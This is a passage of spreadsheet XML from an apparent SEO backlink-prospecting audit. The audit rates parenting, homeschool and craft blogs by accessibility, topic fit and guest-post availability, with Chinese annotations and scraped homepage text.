        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T273" s="21" t="str">
        <x:v>B=3495 不能视为可开发外链机会。 | 请求: https://natashalh.com</x:v>
      </x:c>
    </x:row>
    <x:row r="274">
      <x:c r="A274" s="18" t="str">
        <x:v>273</x:v>
      </x:c>
      <x:c r="B274" s="19" t="str">
        <x:v>cultivatingbrilliantminds.com</x:v>
      </x:c>
      <x:c r="C274" s="19" t="str">
        <x:v>https://cultivatingbrilliantminds.com</x:v>
      </x:c>
      <x:c r="D274" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E274" s="20" t="str">
        <x:v>239</x:v>
      </x:c>
      <x:c r="F274" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G274" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H274" s="19" t="str">
        <x:v>https://cultivatingbrilliantminds.com/</x:v>
      </x:c>
      <x:c r="I274" s="19" t="str">
        <x:v>Cultivating Brilliant Minds -Educational Activities for Kids</x:v>
      </x:c>
      <x:c r="J274" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K274" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L274" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M274" s="19" t="str">
        <x:v>https://cultivatingbrilliantminds.com/</x:v>
      </x:c>
      <x:c r="N274" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O274" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P274" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q274" s="21" t="str">
        <x:v>The best crafts, activities, printables, and recipes for kids! We focus on building educational and developmental skills through play, cooking, and more! Cultivating Brilliant Minds -Educational Activities for Kids Skip to content Join The Teacher Toolkit Club Now - Click Here! 0 Kindergarten First Grade Second Grade Centers Bundles Home Crafts Alphabet Handprint Crafts Name Crafts Paper Plate Crafts Activities Color by Codes Fine Motor Literacy Math Sensory STEM Holidays Cinco de Mayo Christmas Dr. Seuss Day Earth Day Easter Father’s Day Fourth of July Groundhog Day Halloween Hanukkah Lunar New Year Mardi Gras May 4th Star Wars Day Memorial Day Mother’s Day New Year Pi Day Shark Week St. Patrick’s Day Thanksgiving Valentine’s Day Seasonal Spring Summer Autumn Winter Recipes Breakfast Desserts Dinner Drinks Lunch Snacks Shop My Store TPT Shop</x:v>
      </x:c>
      <x:c r="R274" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S274" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T274" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://cultivatingbrilliantminds.com</x:v>
      </x:c>
    </x:row>
    <x:row r="275">
      <x:c r="A275" s="18" t="str">
        <x:v>274</x:v>
      </x:c>
      <x:c r="B275" s="19" t="str">
        <x:v>smartsocial.com</x:v>
      </x:c>
      <x:c r="C275" s="19" t="str">
        <x:v>https://smartsocial.com</x:v>
      </x:c>
      <x:c r="D275" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E275" s="20" t="str">
        <x:v>80</x:v>
      </x:c>
      <x:c r="F275" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G275" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H275" s="19" t="str">
        <x:v>https://www.smartsocial.com/</x:v>
      </x:c>
      <x:c r="I275" s="19" t="str">
        <x:v>SmartSocial.com - Digital Citizenship programs</x:v>
      </x:c>
      <x:c r="J275" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K275" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L275" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M275" s="19" t="str">
        <x:v>https://www.smartsocial.com/</x:v>
      </x:c>
      <x:c r="N275" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O275" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P275" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q275" s="21" t="str">
        <x:v>Our digital citizenship programs Keep Students Safe So They Can Shine Online. We teach parents and educators how to navigate social media with their students. SmartSocial.com - Digital Citizenship programs Medium length banner heading goes her Lorem ipsum dolor sit amet, consectetur adipiscing elit. Button Resources Join Our Next Live Workshops Listen To Our Podcast 450+ Guides &amp; Resources 430+ Teen Slang, Emojis, &amp; Hashtags 170+ Popular Teen App List 25+ Dangerous Challenges 100+ Offline Activities 100+ Online Educational Activities 50+ Popular Video Games 24+ Parental Control Software Human Trafficking Safety Guide Sharing Center Press TV/News Free Parent Quiz Programs Join Our Next Live Workshop Student Internship Request Our Programs Request Josh Ochs to Speak Listen To Our Podcast Who We Serve School Districts School Staff Parents Students Me</x:v>
      </x:c>
      <x:c r="R275" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S275" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T275" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://smartsocial.com</x:v>
      </x:c>
    </x:row>
    <x:row r="276">
      <x:c r="A276" s="18" t="str">
        <x:v>275</x:v>
      </x:c>
      <x:c r="B276" s="19" t="str">
        <x:v>kit.com</x:v>
      </x:c>
      <x:c r="C276" s="19" t="str">
        <x:v>https://kit.com</x:v>
      </x:c>
      <x:c r="D276" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E276" s="20" t="str">
        <x:v>40</x:v>
      </x:c>
      <x:c r="F276" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G276" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H276" s="19" t="str">
        <x:v>https://kit.com/</x:v>
      </x:c>
      <x:c r="I276" s="19" t="str">
        <x:v>Kit</x:v>
      </x:c>
      <x:c r="J276" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K276" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L276" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M276" s="19" t="str">
        <x:v>https://kit.com/</x:v>
      </x:c>
      <x:c r="N276" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O276" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P276" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q276" s="21" t="str">
        <x:v>Kit: The creator marketing platform Kit Are you a robot? 🤖 Hey There! Sorry for the inconvenience, but we need to confirm you're not a robot.</x:v>
      </x:c>
      <x:c r="R276" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S276" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T276" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://kit.com</x:v>
      </x:c>
    </x:row>
    <x:row r="277">
      <x:c r="A277" s="18" t="str">
        <x:v>276</x:v>
      </x:c>
      <x:c r="B277" s="19" t="str">
        <x:v>acrylicpaintingschool.com</x:v>
      </x:c>
      <x:c r="C277" s="19" t="str">
        <x:v>https://acrylicpaintingschool.com</x:v>
      </x:c>
      <x:c r="D277" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E277" s="20" t="str">
        <x:v>38</x:v>
      </x:c>
      <x:c r="F277" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G277" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H277" s="19" t="str">
        <x:v>https://acrylicpaintingschool.com/</x:v>
      </x:c>
      <x:c r="I277" s="19" t="str">
        <x:v>Acrylic Paint Lessons For Beginners | Acrylic Painting School</x:v>
      </x:c>
      <x:c r="J277" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K277" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L277" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M277" s="19" t="str">
        <x:v>https://acrylicpaintingschool.com/</x:v>
      </x:c>
      <x:c r="N277" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O277" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P277" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q277" s="21" t="str">
        <x:v>Educational blog about acrylic painting for beginners with easy tutorials, practical painting tips and simply explained color mixing theory Acrylic Paint Lessons For Beginners | Acrylic Painting School Skip to content Acrylic Painting School Painting blog by Masha Eretnova Menu Menu Log In BLOG START HERE My Acrylic Painting Supplies and Tools Acrylics Supplies Reviews Ideas Gouache Color Mixing Watercolor Oil Pastel Techniques Airbrush Miniatures Basics Crafts Epoxy For Artists Collecting Art Miniatures Terms and Conditions for Acrylicpaintingschool.com Privacy Policy of Acrylicpaintingschool.com AcrylicPaintingSchool Digital Millennium Copyright Act (“DMCA”) Editorial Policy Tutorials Courses &amp; Shop Tools For Painters Acrylic Paint Palette Generator Color Mixing Tool For Artists ABOUT ME💫 Contact Me Acrylic Painting School Me</x:v>
      </x:c>
      <x:c r="R277" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S277" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T277" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://acrylicpaintingschool.com</x:v>
      </x:c>
    </x:row>
    <x:row r="278">
      <x:c r="A278" s="18" t="str">
        <x:v>277</x:v>
      </x:c>
      <x:c r="B278" s="19" t="str">
        <x:v>theartisanlife.com</x:v>
      </x:c>
      <x:c r="C278" s="19" t="str">
        <x:v>https://theartisanlife.com</x:v>
      </x:c>
      <x:c r="D278" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E278" s="20" t="str">
        <x:v>33</x:v>
      </x:c>
      <x:c r="F278" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G278" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H278" s="19" t="str">
        <x:v>https://theartisanlife.com/</x:v>
      </x:c>
      <x:c r="I278" s="19" t="str">
        <x:v>The Artisan Life® - Printables for Busy Moms &amp; Kids</x:v>
      </x:c>
      <x:c r="J278" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K278" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L278" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M278" s="19" t="str">
        <x:v>https://theartisanlife.com/</x:v>
      </x:c>
      <x:c r="N278" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O278" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P278" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q278" s="21" t="str">
        <x:v>Educational printables for your young children so you can get a moment of "me" time without resorting to screen time &amp; planner printables to keep your busy mom life organized. The Artisan Life® - Printables for Busy Moms &amp; Kids Skip to content Start Here Preschool Printables Planners Planners Printable Planners Digital Planners Printables Printables Coloring Books (kids &amp; adult) Baby Shower Games Picture Bingo Pre-K &amp; K Preschool Printables About Me About Me The Artisan Life Blog Log in The Artisan Life Start Here Preschool Printables Planners Printable Planners Digital Planners Printables Coloring Books (kids &amp; adult) Baby Shower Games Picture Bingo Pre-K &amp; K Preschool Printables About Me The Artisan Life Blog Search Log in Cart Item added to your cart View cart Check out Continue shopping Welcome! I help busy parents &amp; teachers stay organized while providing dev</x:v>
      </x:c>
      <x:c r="R278" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S278" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T278" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://theartisanlife.com</x:v>
      </x:c>
    </x:row>
    <x:row r="279">
      <x:c r="A279" s="18" t="str">
        <x:v>278</x:v>
      </x:c>
      <x:c r="B279" s="19" t="str">
        <x:v>pressprintparty.com</x:v>
      </x:c>
      <x:c r="C279" s="19" t="str">
        <x:v>https://pressprintparty.com</x:v>
      </x:c>
      <x:c r="D279" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E279" s="20" t="str">
        <x:v>30</x:v>
      </x:c>
      <x:c r="F279" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G279" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H279" s="19" t="str">
        <x:v>https://www.pressprintparty.com/</x:v>
      </x:c>
      <x:c r="I279" s="19" t="str">
        <x:v>Security Verification</x:v>
      </x:c>
      <x:c r="J279" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K279" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L279" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M279" s="19" t="str">
        <x:v>https://www.pressprintparty.com/</x:v>
      </x:c>
      <x:c r="N279" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O279" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P279" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q279"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a349b9a9292ec087 Client IP: 61.211.1.60 Open Support Ticket Please include these details when opening a support ticket so we can quickly locate the challenged request.</x:v>
      </x:c>
      <x:c r="R279" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S279" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T279" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://pressprintparty.com</x:v>
      </x:c>
    </x:row>
    <x:row r="280">
      <x:c r="A280" s="18" t="str">
        <x:v>279</x:v>
      </x:c>
      <x:c r="B280" s="19" t="str">
        <x:v>thehomeschoolquest.com</x:v>
      </x:c>
      <x:c r="C280" s="19" t="str">
        <x:v>https://thehomeschoolquest.com</x:v>
      </x:c>
      <x:c r="D280" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E280" s="20" t="str">
        <x:v>22</x:v>
      </x:c>
      <x:c r="F280" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G280" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H280" s="19" t="str">
        <x:v>https://thehomeschoolquest.com/</x:v>
      </x:c>
      <x:c r="I280" s="19" t="str">
        <x:v>The Homeschool Quest</x:v>
      </x:c>
      <x:c r="J280" s="19" t="str">
        <x:v>Homeschool 教育博客</x:v>
      </x:c>
      <x:c r="K280" s="19" t="str">
        <x:v>高</x:v>
      </x:c>
      <x:c r="L280" s="19" t="str">
        <x:v>免费 guest article</x:v>
      </x:c>
      <x:c r="M280" s="19" t="str">
        <x:v>https://thehomeschoolquest.com/articlesubmission</x:v>
      </x:c>
      <x:c r="N280" s="19" t="str">
        <x:v>可做</x:v>
      </x:c>
      <x:c r="O280" s="19" t="str">
        <x:v>高</x:v>
      </x:c>
      <x:c r="P280" s="21" t="str">
        <x:v>公开接受免费 guest article；可在作者简介/贡献者位置放链接，但文章不能是直接促销。</x:v>
      </x:c>
      <x:c r="Q280" s="21" t="str">
        <x:v>Find Free &amp; Affordable Homeschool Resources! Spend less time finding resources and more time homeschooling. Whether you're just starting out or have been homeschooling for years, The Homeschool Quest has something for everyone. The Homeschool Quest Skip to main content Read The Magazine! Menu Home Blog START HERE! Read The HQ Magazine Get The Freebie Guide Read The Homeschool Update The HQ Verified Teachers List Volunteer Volunteer at The Homeschool Quest Write A Guest Article Join The Comment Crew Advertise Advertising Club Free Marketing Opportunities Homeschool Business Newsletter Homeschool Business Quest Group About Meet The Team Meet Our Moderators In The Media Contact Join our Facebook group Newsletter The Homeschool Quest Magazine: Issue 14 Real stories on curriculum that works, hidden costs to avoid, and smarter homeschool spending. Read The Magazine! The Homeschool Quest Magazine: Issue 14 Real stories on</x:v>
      </x:c>
      <x:c r="R280" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S280" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T280" s="21" t="str">
        <x:v>适合写家庭科学实验、单位换算教学方法等实用文章。 | 请求: https://thehomeschoolquest.com</x:v>
      </x:c>
    </x:row>
    <x:row r="281">
      <x:c r="A281" s="18" t="str">
        <x:v>280</x:v>
      </x:c>
      <x:c r="B281" s="19" t="str">
        <x:v>thrivinginparenting.com</x:v>
      </x:c>
      <x:c r="C281" s="19" t="str">
        <x:v>https://thrivinginparenting.com</x:v>
      </x:c>
      <x:c r="D281" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E281" s="20" t="str">
        <x:v>20</x:v>
      </x:c>
      <x:c r="F281" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G281" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H281" s="19" t="str">
        <x:v>https://thrivinginparenting.com/</x:v>
      </x:c>
      <x:c r="I281" s="19" t="str">
        <x:v>Thriving In Parenting | Small Steps To A Life You Love</x:v>
      </x:c>
      <x:c r="J281" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K281" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L281" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M281" s="19" t="str">
        <x:v>https://thrivinginparenting.com/</x:v>
      </x:c>
      <x:c r="N281" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O281" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P281" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q281" s="21" t="str">
        <x:v>I want to help you stop surviving and start thriving in your parenting journey!You’ll find here simple tips for a more organized and aesthetically pleasing home, a balance between your family’s and your own needs, and all things PARENTING. Thriving In Parenting | Small Steps To A Life You Love Skip to primary navigation Skip to main content Halloween party planner GET YOURS NOW! Thriving In Parenting Small Steps To A Life You Love Menu Search Start Here About Tamara Contact Your Pregnancy Pregnancy Care Baby Names Shopping Guide Your Kids Your Baby Baby Health Baby Essentials Kids Health Kids Nutrition Kids Activities Gift Guide Parenting Tips Products for Kids Travel with Kids Your Home Home Decor Recipes MSN Slideshows Your Dear Self Best Deals and Products for You Shop Search for Search for Get weekly support in learning how to take small steps to a family life you love Subscribe Now Stop Surviving. Start Thriving. On your </x:v>
      </x:c>
      <x:c r="R281" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S281" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T281" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thrivinginparenting.com</x:v>
      </x:c>
    </x:row>
    <x:row r="282">
      <x:c r="A282" s="18" t="str">
        <x:v>281</x:v>
      </x:c>
      <x:c r="B282" s="19" t="str">
        <x:v>busybloomingjoy.com</x:v>
      </x:c>
      <x:c r="C282" s="19" t="str">
        <x:v>https://busybloomingjoy.com</x:v>
      </x:c>
      <x:c r="D282" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E282" s="20" t="str">
        <x:v>18</x:v>
      </x:c>
      <x:c r="F282" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G282" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H282" s="19" t="str">
        <x:v>https://busybloomingjoy.com/</x:v>
      </x:c>
      <x:c r="I282" s="19" t="str">
        <x:v>Finding joy in motherhood, calming the chaos, accepting the imperfections!</x:v>
      </x:c>
      <x:c r="J282" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K282" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L282" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M282" s="19" t="str">
        <x:v>https://busybloomingjoy.com/</x:v>
      </x:c>
      <x:c r="N282" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O282" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P282" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q282" s="21" t="str">
        <x:v>Navigating the baby and toddler years | sleep solutions | mom life | easy crafts &amp; DIY Finding joy in motherhood, calming the chaos, accepting the imperfections! Skip to content HOME About All About Baby Everything Toddler FREE swaddle course Toggle website search Menu Close your life with littlees unmuddled &amp; enriched Life with Littlees is busy. It’s blooming busy! But there’s joy to be had – in the big moments and in the small. Easier said than done, I get it! Here I hope to help you navigate the baby and toddler years and give your kids the best – WITHOUT losing your sanity. AND inspire you to make the most of your new life as a mum (when I say make the most, I mean craft and create…) It won’t all be rainbows and butterflies, but what is?! read more HOW CAN i HELP YOU? Teen</x:v>
      </x:c>
      <x:c r="R282" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S282" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T282" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://busybloomingjoy.com</x:v>
      </x:c>
    </x:row>
    <x:row r="283">
      <x:c r="A283" s="18" t="str">
        <x:v>282</x:v>
      </x:c>
      <x:c r="B283" s="19" t="str">
        <x:v>needlepointers.com</x:v>
      </x:c>
      <x:c r="C283" s="19" t="str">
        <x:v>https://needlepointers.com</x:v>
      </x:c>
      <x:c r="D283" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E283" s="20" t="str">
        <x:v>17</x:v>
      </x:c>
      <x:c r="F283" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G283" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H283" s="19" t="str">
        <x:v>https://needlepointers.com/</x:v>
      </x:c>
      <x:c r="I283" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J283" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K283" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L283" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M283" s="19" t="str">
        <x:v>https://needlepointers.com/</x:v>
      </x:c>
      <x:c r="N283" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O283" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P283" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q283" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R283" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S283" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T283" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://needlepointers.com</x:v>
      </x:c>
    </x:row>
    <x:row r="284">
      <x:c r="A284" s="18" t="str">
        <x:v>283</x:v>
      </x:c>
      <x:c r="B284" s="19" t="str">
        <x:v>dunistudio.com</x:v>
      </x:c>
      <x:c r="C284" s="19" t="str">
        <x:v>https://dunistudio.com</x:v>
      </x:c>
      <x:c r="D284" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E284" s="20" t="str">
        <x:v>15</x:v>
      </x:c>
      <x:c r="F284" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G284" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H284" s="19" t="str">
        <x:v>https://www.dunistudio.com/</x:v>
      </x:c>
      <x:c r="I284" s="19" t="str">
        <x:v>Duni's Studio</x:v>
      </x:c>
      <x:c r="J284" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K284" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L284" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M284" s="19" t="str">
        <x:v>https://www.dunistudio.com/</x:v>
      </x:c>
      <x:c r="N284" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O284" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P284" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q284" s="21" t="str">
        <x:v>A craft &amp; lifestyle blog which focuses on DIY, upcycling, mixed media art and promoting an inspired lifestyle. Duni's Studio skip to main | skip to sidebar Home Crafts Fashion Seasonal Easy Mixed Media Travels imprint Sunday, August 30 A Simple Art Journal Page Hello dear blog friends! Getting back to art after a long, unforeseen absence has me feeling unsure where to start. It's like I'm afraid I may have forgotten how to make art. I know, silly, but still I hesitate. I'm feeling a little stronger, a little more myself again...so I simply wanted to play in my art journal with no specific goal in mind. There's a soothing quality to art journaling and I come back to it again and again, if only to calm my mind. I chose some of my favorite colors and supplies, such as my Aqua Markers, a stencil plus a f</x:v>
      </x:c>
      <x:c r="R284" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S284" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T284" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://dunistudio.com</x:v>
      </x:c>
    </x:row>
    <x:row r="285">
      <x:c r="A285" s="18" t="str">
        <x:v>284</x:v>
      </x:c>
      <x:c r="B285" s="19" t="str">
        <x:v>teachmemama.com</x:v>
      </x:c>
      <x:c r="C285" s="19" t="str">
        <x:v>https://teachmemama.com</x:v>
      </x:c>
      <x:c r="D285" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E285" s="20" t="str">
        <x:v>15</x:v>
      </x:c>
      <x:c r="F285" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G285" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H285" s="19" t="str">
        <x:v>https://teachmemama.com/</x:v>
      </x:c>
      <x:c r="I285" s="19" t="str">
        <x:v>Home - Teach Me, Mama</x:v>
      </x:c>
      <x:c r="J285" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K285" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L285" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M285" s="19" t="str">
        <x:v>https://teachmemama.com/</x:v>
      </x:c>
      <x:c r="N285" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O285" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P285" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q285" s="21" t="str">
        <x:v>Home - Teach Me, Mama Search for: Skip to content Home Homeschooling Bible Curriculum Curriculum Reviews Language Arts Writing Science Social Studies Preschool Holidays 4th of July Black History Month Christmas Dr Seuss Day Earth Day Easter Father’s Day Groundhog Day Halloween Mother’s Day President’s Day St Patrick’s Day Thanksgiving Valentine’s Day Crafts Preschool Crafts Holidays 4th of July Black History Month Christmas Dr Seuss Day Earth Day Easter Father’s Day Groundhog Day Halloween Mother’s Day President’s Day St Patrick’s Day Thanksgiving Valentine’s Day Seasons Fall Spring Summer Winter Living Books Book Lists Store About Privacy Policy TERMS AND CONDITIONS Contact Home Homeschooli</x:v>
      </x:c>
      <x:c r="R285" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S285" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T285" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://teachmemama.com</x:v>
      </x:c>
    </x:row>
    <x:row r="286">
      <x:c r="A286" s="18" t="str">
        <x:v>285</x:v>
      </x:c>
      <x:c r="B286" s="19" t="str">
        <x:v>addiedwyer.com</x:v>
      </x:c>
      <x:c r="C286" s="19" t="str">
        <x:v>https://addiedwyer.com</x:v>
      </x:c>
      <x:c r="D286" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E286" s="20" t="str">
        <x:v>12</x:v>
      </x:c>
      <x:c r="F286" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G286" s="19" t="str">
        <x:v>可访问</x:v>
